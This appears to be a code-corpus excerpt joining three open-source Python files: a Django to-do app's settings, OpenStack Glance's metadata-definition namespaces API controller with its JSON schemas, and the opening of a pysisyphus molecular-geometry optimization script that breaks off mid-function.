# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
DJANGO_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
THIRD_PARTY_APPS = []
CUSTOM_APPS = [
'tasks.apps.TasksConfig',
]
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + CUSTOM_APPS
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['todo/templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| jacoboamn87/todolist | todo/settings.py | Python | gpl-3.0 | 3,308 | 0.001209 |
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http.client as http
import urllib.parse as urlparse
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import encodeutils
import webob.exc
from wsme.rest import json
from glance.api import policy
from glance.api.v2.model.metadef_namespace import Namespace
from glance.api.v2.model.metadef_namespace import Namespaces
from glance.api.v2.model.metadef_object import MetadefObject
from glance.api.v2.model.metadef_property_type import PropertyType
from glance.api.v2.model.metadef_resource_type import ResourceTypeAssociation
from glance.api.v2.model.metadef_tag import MetadefTag
from glance.api.v2 import policy as api_policy
from glance.common import exception
from glance.common import utils
from glance.common import wsgi
from glance.common import wsme_utils
import glance.db
import glance.gateway
from glance.i18n import _, _LE
import glance.notifier
import glance.schema
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class NamespaceController(object):
def __init__(self, db_api=None, policy_enforcer=None, notifier=None):
self.db_api = db_api or glance.db.get_api()
self.policy = policy_enforcer or policy.Enforcer()
self.notifier = notifier or glance.notifier.Notifier()
self.gateway = glance.gateway.Gateway(db_api=self.db_api,
notifier=self.notifier,
policy_enforcer=self.policy)
self.ns_schema_link = '/v2/schemas/metadefs/namespace'
self.obj_schema_link = '/v2/schemas/metadefs/object'
self.tag_schema_link = '/v2/schemas/metadefs/tag'
def index(self, req, marker=None, limit=None, sort_key='created_at',
sort_dir='desc', filters=None):
try:
ns_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
policy_check = api_policy.MetadefAPIPolicy(
req.context,
enforcer=self.policy)
# NOTE(abhishekk): This is just a "do you have permission to
# list namespace" check. Each namespace is checked against
# get_metadef_namespace below.
policy_check.get_metadef_namespaces()
# NOTE(abhishekk): We also need to fetch resource_types associated
# with namespaces, so better to check we have permission for the
# same in advance.
policy_check.list_metadef_resource_types()
# Get namespace id
if marker:
namespace_obj = ns_repo.get(marker)
marker = namespace_obj.namespace_id
database_ns_list = ns_repo.list(
marker=marker, limit=limit, sort_key=sort_key,
sort_dir=sort_dir, filters=filters)
ns_list = [
ns for ns in database_ns_list if api_policy.MetadefAPIPolicy(
req.context, md_resource=ns, enforcer=self.policy).check(
'get_metadef_namespace')]
rs_repo = (
self.gateway.get_metadef_resource_type_repo(
req.context, authorization_layer=False))
for db_namespace in ns_list:
# Get resource type associations
filters = dict()
filters['namespace'] = db_namespace.namespace
repo_rs_type_list = rs_repo.list(filters=filters)
resource_type_list = [
ResourceTypeAssociation.to_wsme_model(
resource_type
) for resource_type in repo_rs_type_list]
if resource_type_list:
db_namespace.resource_type_associations = (
resource_type_list)
namespace_list = [Namespace.to_wsme_model(
db_namespace,
get_namespace_href(db_namespace),
self.ns_schema_link) for db_namespace in ns_list]
namespaces = Namespaces()
namespaces.namespaces = namespace_list
if len(namespace_list) != 0 and len(namespace_list) == limit:
namespaces.next = ns_list[-1].namespace
except exception.Forbidden as e:
LOG.debug("User not permitted to retrieve metadata namespaces "
"index")
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
return namespaces
@utils.mutating
def create(self, req, namespace):
try:
namespace_created = False
# Create Namespace
ns_factory = self.gateway.get_metadef_namespace_factory(
req.context, authorization_layer=False)
ns_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
# NOTE(abhishekk): Here we are going to check if user is authorized
# to create namespace, resource_types, objects, properties etc.
policy_check = api_policy.MetadefAPIPolicy(
req.context, enforcer=self.policy)
policy_check.add_metadef_namespace()
if namespace.resource_type_associations:
policy_check.add_metadef_resource_type_association()
if namespace.objects:
policy_check.add_metadef_object()
if namespace.properties:
policy_check.add_metadef_property()
if namespace.tags:
policy_check.add_metadef_tag()
# NOTE(abhishekk): As we are getting rid of auth layer, this
# is the place where we should add owner if it is not specified
# in request.
kwargs = namespace.to_dict()
if 'owner' not in kwargs:
kwargs.update({'owner': req.context.owner})
new_namespace = ns_factory.new_namespace(**kwargs)
ns_repo.add(new_namespace)
namespace_created = True
# Create Resource Types
if namespace.resource_type_associations:
rs_factory = (self.gateway.get_metadef_resource_type_factory(
req.context, authorization_layer=False))
rs_repo = self.gateway.get_metadef_resource_type_repo(
req.context, authorization_layer=False)
for resource_type in namespace.resource_type_associations:
new_resource = rs_factory.new_resource_type(
namespace=namespace.namespace,
**resource_type.to_dict())
rs_repo.add(new_resource)
# Create Objects
if namespace.objects:
object_factory = self.gateway.get_metadef_object_factory(
req.context, authorization_layer=False)
object_repo = self.gateway.get_metadef_object_repo(
req.context, authorization_layer=False)
for metadata_object in namespace.objects:
new_meta_object = object_factory.new_object(
namespace=namespace.namespace,
**metadata_object.to_dict())
object_repo.add(new_meta_object)
# Create Tags
if namespace.tags:
tag_factory = self.gateway.get_metadef_tag_factory(
req.context, authorization_layer=False)
tag_repo = self.gateway.get_metadef_tag_repo(
req.context, authorization_layer=False)
for metadata_tag in namespace.tags:
new_meta_tag = tag_factory.new_tag(
namespace=namespace.namespace,
**metadata_tag.to_dict())
tag_repo.add(new_meta_tag)
# Create Namespace Properties
if namespace.properties:
prop_factory = (self.gateway.get_metadef_property_factory(
req.context, authorization_layer=False))
prop_repo = self.gateway.get_metadef_property_repo(
req.context, authorization_layer=False)
for (name, value) in namespace.properties.items():
new_property_type = (
prop_factory.new_namespace_property(
namespace=namespace.namespace,
**self._to_property_dict(name, value)
))
prop_repo.add(new_property_type)
except exception.Invalid as e:
msg = (_("Couldn't create metadata namespace: %s")
% encodeutils.exception_to_unicode(e))
raise webob.exc.HTTPBadRequest(explanation=msg)
except exception.Forbidden as e:
self._cleanup_namespace(ns_repo, namespace, namespace_created)
LOG.debug("User not permitted to create metadata namespace")
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
self._cleanup_namespace(ns_repo, namespace, namespace_created)
raise webob.exc.HTTPNotFound(explanation=e.msg)
except exception.Duplicate as e:
self._cleanup_namespace(ns_repo, namespace, namespace_created)
raise webob.exc.HTTPConflict(explanation=e.msg)
# Return the user namespace as we don't expose the id to user
new_namespace.properties = namespace.properties
new_namespace.objects = namespace.objects
new_namespace.resource_type_associations = (
namespace.resource_type_associations)
new_namespace.tags = namespace.tags
return Namespace.to_wsme_model(new_namespace,
get_namespace_href(new_namespace),
self.ns_schema_link)
def _to_property_dict(self, name, value):
# Convert the model PropertyTypes dict to a JSON string
db_property_type_dict = dict()
db_property_type_dict['schema'] = json.tojson(PropertyType, value)
db_property_type_dict['name'] = name
return db_property_type_dict
def _cleanup_namespace(self, namespace_repo, namespace, namespace_created):
if namespace_created:
try:
namespace_obj = namespace_repo.get(namespace.namespace)
namespace_obj.delete()
namespace_repo.remove(namespace_obj)
LOG.debug("Cleaned up namespace %(namespace)s ",
{'namespace': namespace.namespace})
except Exception as e:
msg = (_LE("Failed to delete namespace %(namespace)s."
"Exception: %(exception)s"),
{'namespace': namespace.namespace,
'exception': encodeutils.exception_to_unicode(e)})
LOG.error(msg)
def show(self, req, namespace, filters=None):
try:
# Get namespace
ns_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
try:
namespace_obj = ns_repo.get(namespace)
policy_check = api_policy.MetadefAPIPolicy(
req.context,
md_resource=namespace_obj,
enforcer=self.policy)
policy_check.get_metadef_namespace()
except (exception.Forbidden, webob.exc.HTTPForbidden):
LOG.debug("User not permitted to show namespace '%s'",
namespace)
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
raise webob.exc.HTTPNotFound()
# NOTE(abhishekk): We also need to fetch resource_types, objects,
# properties, tags associated with namespace, so better to check
# whether user has permissions for the same.
policy_check.list_metadef_resource_types()
policy_check.get_metadef_objects()
policy_check.get_metadef_properties()
policy_check.get_metadef_tags()
namespace_detail = Namespace.to_wsme_model(
namespace_obj,
get_namespace_href(namespace_obj),
self.ns_schema_link)
ns_filters = dict()
ns_filters['namespace'] = namespace
# Get objects
object_repo = self.gateway.get_metadef_object_repo(
req.context, authorization_layer=False)
db_metaobject_list = object_repo.list(filters=ns_filters)
object_list = [MetadefObject.to_wsme_model(
db_metaobject,
get_object_href(namespace, db_metaobject),
self.obj_schema_link) for db_metaobject in db_metaobject_list]
if object_list:
namespace_detail.objects = object_list
# Get resource type associations
rs_repo = self.gateway.get_metadef_resource_type_repo(
req.context, authorization_layer=False)
db_resource_type_list = rs_repo.list(filters=ns_filters)
resource_type_list = [ResourceTypeAssociation.to_wsme_model(
resource_type) for resource_type in db_resource_type_list]
if resource_type_list:
namespace_detail.resource_type_associations = (
resource_type_list)
# Get properties
prop_repo = self.gateway.get_metadef_property_repo(
req.context, authorization_layer=False)
db_properties = prop_repo.list(filters=ns_filters)
property_list = Namespace.to_model_properties(db_properties)
if property_list:
namespace_detail.properties = property_list
if filters and filters['resource_type']:
namespace_detail = self._prefix_property_name(
namespace_detail, filters['resource_type'])
# Get tags
tag_repo = self.gateway.get_metadef_tag_repo(
req.context, authorization_layer=False)
db_metatag_list = tag_repo.list(filters=ns_filters)
tag_list = [MetadefTag(**{'name': db_metatag.name})
for db_metatag in db_metatag_list]
if tag_list:
namespace_detail.tags = tag_list
except exception.Forbidden as e:
LOG.debug("User not permitted to show metadata namespace "
"'%s'", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
return namespace_detail
def update(self, req, user_ns, namespace):
namespace_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
try:
ns_obj = namespace_repo.get(namespace)
except (exception.Forbidden, exception.NotFound):
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
msg = _("Namespace %s not found") % namespace
raise webob.exc.HTTPNotFound(explanation=msg)
try:
# NOTE(abhishekk): Here we are just checking if use is authorized
# to modify the namespace or not
api_policy.MetadefAPIPolicy(
req.context,
md_resource=ns_obj,
enforcer=self.policy).modify_metadef_namespace()
ns_obj._old_namespace = ns_obj.namespace
ns_obj.namespace = wsme_utils._get_value(user_ns.namespace)
ns_obj.display_name = wsme_utils._get_value(user_ns.display_name)
ns_obj.description = wsme_utils._get_value(user_ns.description)
# Following optional fields will default to same values as in
# create namespace if not specified
ns_obj.visibility = (
wsme_utils._get_value(user_ns.visibility) or 'private')
ns_obj.protected = (
wsme_utils._get_value(user_ns.protected) or False)
ns_obj.owner = (
wsme_utils._get_value(user_ns.owner) or req.context.owner)
updated_namespace = namespace_repo.save(ns_obj)
except exception.Invalid as e:
msg = (_("Couldn't update metadata namespace: %s")
% encodeutils.exception_to_unicode(e))
raise webob.exc.HTTPBadRequest(explanation=msg)
except exception.Forbidden as e:
LOG.debug("User not permitted to update metadata namespace "
"'%s'", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
except exception.Duplicate as e:
raise webob.exc.HTTPConflict(explanation=e.msg)
return Namespace.to_wsme_model(updated_namespace,
get_namespace_href(updated_namespace),
self.ns_schema_link)
def delete(self, req, namespace):
namespace_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
try:
namespace_obj = namespace_repo.get(namespace)
except (exception.Forbidden, exception.NotFound):
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
msg = _("Namespace %s not found") % namespace
raise webob.exc.HTTPNotFound(explanation=msg)
try:
# NOTE(abhishekk): Here we are just checking user is authorized to
# delete the namespace or not.
api_policy.MetadefAPIPolicy(
req.context,
md_resource=namespace_obj,
enforcer=self.policy).delete_metadef_namespace()
namespace_obj.delete()
namespace_repo.remove(namespace_obj)
except exception.Forbidden as e:
LOG.debug("User not permitted to delete metadata namespace "
"'%s'", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
def delete_objects(self, req, namespace):
ns_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
try:
namespace_obj = ns_repo.get(namespace)
except (exception.Forbidden, exception.NotFound):
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
msg = _("Namespace %s not found") % namespace
raise webob.exc.HTTPNotFound(explanation=msg)
try:
# NOTE(abhishekk): This call currently checks whether user
# has permission to delete the namespace or not before deleting
# the objects associated with it.
api_policy.MetadefAPIPolicy(
req.context,
md_resource=namespace_obj,
enforcer=self.policy).delete_metadef_namespace()
namespace_obj.delete()
ns_repo.remove_objects(namespace_obj)
except exception.Forbidden as e:
LOG.debug("User not permitted to delete metadata objects "
"within '%s' namespace", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
def delete_tags(self, req, namespace):
ns_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
try:
namespace_obj = ns_repo.get(namespace)
except (exception.Forbidden, exception.NotFound):
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
msg = _("Namespace %s not found") % namespace
raise webob.exc.HTTPNotFound(explanation=msg)
try:
# NOTE(abhishekk): This call currently checks whether user
# has permission to delete the namespace or not before deleting
# the objects associated with it.
policy_check = api_policy.MetadefAPIPolicy(
req.context,
md_resource=namespace_obj,
enforcer=self.policy)
policy_check.delete_metadef_namespace()
# NOTE(abhishekk): This call checks whether user
# has permission to delete the tags or not.
policy_check.delete_metadef_tags()
namespace_obj.delete()
ns_repo.remove_tags(namespace_obj)
except exception.Forbidden as e:
LOG.debug("User not permitted to delete metadata tags "
"within '%s' namespace", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
def delete_properties(self, req, namespace):
ns_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
try:
namespace_obj = ns_repo.get(namespace)
except (exception.Forbidden, exception.NotFound):
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
msg = _("Namespace %s not found") % namespace
raise webob.exc.HTTPNotFound(explanation=msg)
try:
# NOTE(abhishekk): This call currently checks whether user
# has permission to delete the namespace or not before deleting
# the objects associated with it.
api_policy.MetadefAPIPolicy(
req.context,
md_resource=namespace_obj,
enforcer=self.policy).delete_metadef_namespace()
namespace_obj.delete()
ns_repo.remove_properties(namespace_obj)
except exception.Forbidden as e:
LOG.debug("User not permitted to delete metadata properties "
"within '%s' namespace", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
def _prefix_property_name(self, namespace_detail, user_resource_type):
prefix = None
if user_resource_type and namespace_detail.resource_type_associations:
for resource_type in namespace_detail.resource_type_associations:
if resource_type.name == user_resource_type:
prefix = resource_type.prefix
break
if prefix:
if namespace_detail.properties:
new_property_dict = dict()
for (key, value) in namespace_detail.properties.items():
new_property_dict[prefix + key] = value
namespace_detail.properties = new_property_dict
if namespace_detail.objects:
for object in namespace_detail.objects:
new_object_property_dict = dict()
for (key, value) in object.properties.items():
new_object_property_dict[prefix + key] = value
object.properties = new_object_property_dict
if object.required and len(object.required) > 0:
required = [prefix + name for name in object.required]
object.required = required
return namespace_detail
class RequestDeserializer(wsgi.JSONRequestDeserializer):
_disallowed_properties = ['self', 'schema', 'created_at', 'updated_at']
def __init__(self, schema=None):
super(RequestDeserializer, self).__init__()
self.schema = schema or get_schema()
def _get_request_body(self, request):
output = super(RequestDeserializer, self).default(request)
if 'body' not in output:
msg = _('Body expected in request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
return output['body']
@classmethod
def _check_allowed(cls, image):
for key in cls._disallowed_properties:
if key in image:
msg = _("Attribute '%s' is read-only.") % key
raise webob.exc.HTTPForbidden(explanation=msg)
def index(self, request):
params = request.params.copy()
limit = params.pop('limit', None)
marker = params.pop('marker', None)
sort_dir = params.pop('sort_dir', 'desc')
if limit is None:
limit = CONF.limit_param_default
limit = min(CONF.api_limit_max, int(limit))
query_params = {
'sort_key': params.pop('sort_key', 'created_at'),
'sort_dir': self._validate_sort_dir(sort_dir),
'filters': self._get_filters(params)
}
if marker is not None:
query_params['marker'] = marker
if limit is not None:
query_params['limit'] = self._validate_limit(limit)
return query_params
def _validate_sort_dir(self, sort_dir):
if sort_dir not in ['asc', 'desc']:
msg = _('Invalid sort direction: %s') % sort_dir
raise webob.exc.HTTPBadRequest(explanation=msg)
return sort_dir
def _get_filters(self, filters):
visibility = filters.get('visibility')
if visibility:
if visibility not in ['public', 'private']:
msg = _('Invalid visibility value: %s') % visibility
raise webob.exc.HTTPBadRequest(explanation=msg)
return filters
def _validate_limit(self, limit):
try:
limit = int(limit)
except ValueError:
msg = _("limit param must be an integer")
raise webob.exc.HTTPBadRequest(explanation=msg)
if limit < 0:
msg = _("limit param must be positive")
raise webob.exc.HTTPBadRequest(explanation=msg)
return limit
def show(self, request):
params = request.params.copy()
query_params = {
'filters': self._get_filters(params)
}
return query_params
def create(self, request):
body = self._get_request_body(request)
self._check_allowed(body)
try:
self.schema.validate(body)
except exception.InvalidObject as e:
raise webob.exc.HTTPBadRequest(explanation=e.msg)
namespace = json.fromjson(Namespace, body)
return dict(namespace=namespace)
def update(self, request):
body = self._get_request_body(request)
self._check_allowed(body)
try:
self.schema.validate(body)
except exception.InvalidObject as e:
raise webob.exc.HTTPBadRequest(explanation=e.msg)
namespace = json.fromjson(Namespace, body)
return dict(user_ns=namespace)
class ResponseSerializer(wsgi.JSONResponseSerializer):
def __init__(self, schema=None):
super(ResponseSerializer, self).__init__()
self.schema = schema
def create(self, response, namespace):
ns_json = json.tojson(Namespace, namespace)
response = self.__render(ns_json, response, http.CREATED)
response.location = get_namespace_href(namespace)
def show(self, response, namespace):
ns_json = json.tojson(Namespace, namespace)
response = self.__render(ns_json, response)
def index(self, response, result):
params = dict(response.request.params)
params.pop('marker', None)
query = urlparse.urlencode(params)
result.first = "/v2/metadefs/namespaces"
result.schema = "/v2/schemas/metadefs/namespaces"
if query:
result.first = '%s?%s' % (result.first, query)
if result.next:
params['marker'] = result.next
next_query = urlparse.urlencode(params)
result.next = '/v2/metadefs/namespaces?%s' % next_query
ns_json = json.tojson(Namespaces, result)
response = self.__render(ns_json, response)
def update(self, response, namespace):
ns_json = json.tojson(Namespace, namespace)
response = self.__render(ns_json, response, http.OK)
def delete(self, response, result):
response.status_int = http.NO_CONTENT
def delete_objects(self, response, result):
response.status_int = http.NO_CONTENT
def delete_properties(self, response, result):
response.status_int = http.NO_CONTENT
def delete_tags(self, response, result):
response.status_int = http.NO_CONTENT
def __render(self, json_data, response, response_status=None):
body = jsonutils.dumps(json_data, ensure_ascii=False)
response.unicode_body = body
response.content_type = 'application/json'
if response_status:
response.status_int = response_status
return response
def _get_base_definitions():
return get_schema_definitions()
def get_schema_definitions():
return {
"positiveInteger": {
"type": "integer",
"minimum": 0
},
"positiveIntegerDefault0": {
"allOf": [
{"$ref": "#/definitions/positiveInteger"},
{"default": 0}
]
},
"stringArray": {
"type": "array",
"items": {"type": "string"},
# "minItems": 1,
"uniqueItems": True
},
"property": {
"type": "object",
"additionalProperties": {
"type": "object",
"required": ["title", "type"],
"properties": {
"name": {
"type": "string",
"maxLength": 80
},
"title": {
"type": "string"
},
"description": {
"type": "string"
},
"operators": {
"type": "array",
"items": {
"type": "string"
}
},
"type": {
"type": "string",
"enum": [
"array",
"boolean",
"integer",
"number",
"object",
"string",
None
]
},
"required": {
"$ref": "#/definitions/stringArray"
},
"minimum": {
"type": "number"
},
"maximum": {
"type": "number"
},
"maxLength": {
"$ref": "#/definitions/positiveInteger"
},
"minLength": {
"$ref": "#/definitions/positiveIntegerDefault0"
},
"pattern": {
"type": "string",
"format": "regex"
},
"enum": {
"type": "array"
},
"readonly": {
"type": "boolean"
},
"default": {},
"items": {
"type": "object",
"properties": {
"type": {
"type": "string",
"enum": [
"array",
"boolean",
"integer",
"number",
"object",
"string",
None
]
},
"enum": {
"type": "array"
}
}
},
"maxItems": {
"$ref": "#/definitions/positiveInteger"
},
"minItems": {
"$ref": "#/definitions/positiveIntegerDefault0"
},
"uniqueItems": {
"type": "boolean",
"default": False
},
"additionalItems": {
"type": "boolean"
},
}
}
}
}
def _get_base_properties():
return {
"namespace": {
"type": "string",
"description": _("The unique namespace text."),
"maxLength": 80,
},
"display_name": {
"type": "string",
"description": _("The user friendly name for the namespace. Used "
"by UI if available."),
"maxLength": 80,
},
"description": {
"type": "string",
"description": _("Provides a user friendly description of the "
"namespace."),
"maxLength": 500,
},
"visibility": {
"type": "string",
"description": _("Scope of namespace accessibility."),
"enum": ["public", "private"],
},
"protected": {
"type": "boolean",
"description": _("If true, namespace will not be deletable."),
},
"owner": {
"type": "string",
"description": _("Owner of the namespace."),
"maxLength": 255,
},
"created_at": {
"type": "string",
"readOnly": True,
"description": _("Date and time of namespace creation"),
"format": "date-time"
},
"updated_at": {
"type": "string",
"readOnly": True,
"description": _("Date and time of the last namespace"
" modification"),
"format": "date-time"
},
"schema": {
'readOnly': True,
"type": "string"
},
"self": {
'readOnly': True,
"type": "string"
},
"resource_type_associations": {
"type": "array",
"items": {
"type": "object",
"properties": {
"name": {
"type": "string"
},
"prefix": {
"type": "string"
},
"properties_target": {
"type": "string"
}
}
}
},
"properties": {
"$ref": "#/definitions/property"
},
"objects": {
"type": "array",
"items": {
"type": "object",
"properties": {
"name": {
"type": "string"
},
"description": {
"type": "string"
},
"required": {
"$ref": "#/definitions/stringArray"
},
"properties": {
"$ref": "#/definitions/property"
},
}
}
},
"tags": {
"type": "array",
"items": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
}
}
},
}
def get_schema():
properties = _get_base_properties()
definitions = _get_base_definitions()
mandatory_attrs = Namespace.get_mandatory_attrs()
schema = glance.schema.Schema(
'namespace',
properties,
required=mandatory_attrs,
definitions=definitions
)
return schema
def get_collection_schema():
namespace_schema = get_schema()
return glance.schema.CollectionSchema('namespaces', namespace_schema)
def get_namespace_href(namespace):
base_href = '/v2/metadefs/namespaces/%s' % namespace.namespace
return base_href
def get_object_href(namespace_name, metadef_object):
base_href = ('/v2/metadefs/namespaces/%s/objects/%s' %
(namespace_name, metadef_object.name))
return base_href
def get_tag_href(namespace_name, metadef_tag):
base_href = ('/v2/metadefs/namespaces/%s/tags/%s' %
(namespace_name, metadef_tag.name))
return base_href
def create_resource():
"""Namespaces resource factory method"""
schema = get_schema()
deserializer = RequestDeserializer(schema)
serializer = ResponseSerializer(schema)
controller = NamespaceController()
return wsgi.Resource(controller, deserializer, serializer)
| openstack/glance | glance/api/v2/metadef_namespaces.py | Python | apache-2.0 | 38,490 | 0 |
# [1] https://doi.org/10.1002/jcc.26495
# Habershon, 2021
"""
prp a901cdfacc579eb63b193cbc9043212e8b57746f
pysis 340ab6105ac4156f0613b4d0e8f080d9f195530c
do_trans accidentally disabled in transtorque
"""
from functools import reduce
import itertools as it
import numpy as np
from pysisyphus.calculators import (
HardSphere,
TransTorque,
AtomAtomTransTorque,
Composite,
)
from pysisyphus.constants import BOHR2ANG
from pysisyphus.Geometry import Geometry
from pysisyphus.helpers import align_coords
from pysisyphus.helpers_pure import highlight_text
from pysisyphus.init_logging import init_logging
from pysisyphus.intcoords.setup import get_fragments, get_bond_sets
from pysisyphus.xyzloader import coords_to_trj, make_xyz_str
init_logging()
class SteepestDescent:
def __init__(
self,
geom,
max_cycles=1000,
max_step=0.05,
rms_force=0.05,
rms_force_only=True,
prefix=None,
dump=False,
print_mod=25,
):
self.geom = geom
self.max_cycles = max_cycles
self.max_step = max_step
self.rms_force = rms_force
self.rms_force_only = rms_force_only
self.prefix = prefix
self.dump = dump
self.print_mod = print_mod
self.all_coords = np.zeros((max_cycles, self.geom.coords.size))
def run(self):
coords = self.geom.coords.copy()
to_dump = []
for i in range(self.max_cycles):
self.all_coords[i] = coords.copy()
if self.dump and (i % 100) == 0:
to_dump.append(self.geom.as_xyz(cart_coords=coords))
results = self.geom.get_energy_and_forces_at(coords)
forces = results["forces"]
norm = np.linalg.norm(forces)
rms = np.sqrt(np.mean(forces ** 2))
if rms <= self.rms_force:
print(f"Converged in cycle {i}. Breaking.")
break
if i > 0:
beta = forces.dot(forces) / self.prev_forces.dot(self.prev_forces)
step = forces + beta * self.prev_step
else:
step = forces.copy()
# step = forces.copy()
step *= min(self.max_step / np.abs(step).max(), 1)
if i % self.print_mod == 0:
print(
f"{i:03d}: |forces|={norm: >12.6f} "
f"rms(forces)={np.sqrt(np.mean(forces**2)): >12.6f} "
f"|step|={np.linalg.norm(step): >12.6f}"
)
coords += step
self.prev_step = step
self.prev_forces = forces
self.geom.coords = coords
self.all_coords = self.all_coords[: i + 1]
if to_dump:
with open("optimization.trj", "w") as handle:
handle.write("\n".join(to_dump))
def get_fragments_and_bonds(geoms):
if isinstance(geoms, Geometry) or len(geoms) == 1:
geom = geoms
atoms = geom.atoms
coords3d = geom.coords3d
bonds = [frozenset(bond) for bond in get_bond_sets(atoms, coords3d)]
fragments = get_fragments(atoms, coords3d.flatten(), bond_inds=bonds)
frag_inds = list(it.chain(*fragments))
if len(frag_inds) != len(atoms):
all_inds = list(range(len(atoms)))
missing_inds = set(all_inds) - set(frag_inds)
for mi in missing_inds:
fragments.append(frozenset((mi,)))
frag_bonds = [
list(filter(lambda bond: bond <= frag, bonds)) for frag in fragments
]
# frag_atoms = [[a for i, a in enumerate(atoms) if i in frag] for frag in fragments]
# Assert that we do not have any interfragment bonds
assert reduce((lambda x, y: x + len(y)), frag_bonds, 0) == len(bonds)
union_geom = geom.copy(coord_type="cart")
else:
# Form union, determine consistent new indices for all atoms and calculate bonds
raise Exception()
# return fragments, frag_bonds, set(bonds), frag_atoms
return fragments, frag_bonds, set(bonds), union_geom
def get_rot_mat(coords3d_1, coords3d_2, center=False):
coords3d_1 = coords3d_1.copy().reshape(-1, 3)
coords3d_2 = coords3d_2.copy().reshape(-1, 3)
def _center(coords3d):
return coords3d - coords3d.mean(axis=0)
if center:
coords3d_1 = _center(coords3d_1)
coords3d_2 = _center(coords3d_2)
tmp_mat = coords3d_1.T.dot(coords3d_2)
U, W, Vt = np.linalg.svd(tmp_mat)
rot_mat = U.dot(Vt)
# Avoid reflections
if np.linalg.det(rot_mat) < 0:
U[:, -1] *= -1
rot_mat = U.dot(Vt)
return rot_mat
def get_steps_to_active_atom_mean(
frag_lists, iter_frag_lists, ind_dict, coords3d, skip=True
):
frag_num = len(frag_lists)
steps = np.zeros((frag_num, 3))
for m, frag_m in enumerate(frag_lists):
step_m = np.zeros(3)
for n, _ in enumerate(iter_frag_lists):
if skip and m == n:
continue
active_inds = ind_dict[(n, m)]
if len(active_inds) == 0:
continue
step_m += coords3d[active_inds].mean(axis=0)
step_m /= frag_num
steps[m] = step_m
return steps
def report_frags(rgeom, pgeom, rfrags, pfrags, rbond_diff, pbond_diff):
for name, geom in (("Reactant(s)", rgeom), ("Product(s)", pgeom)):
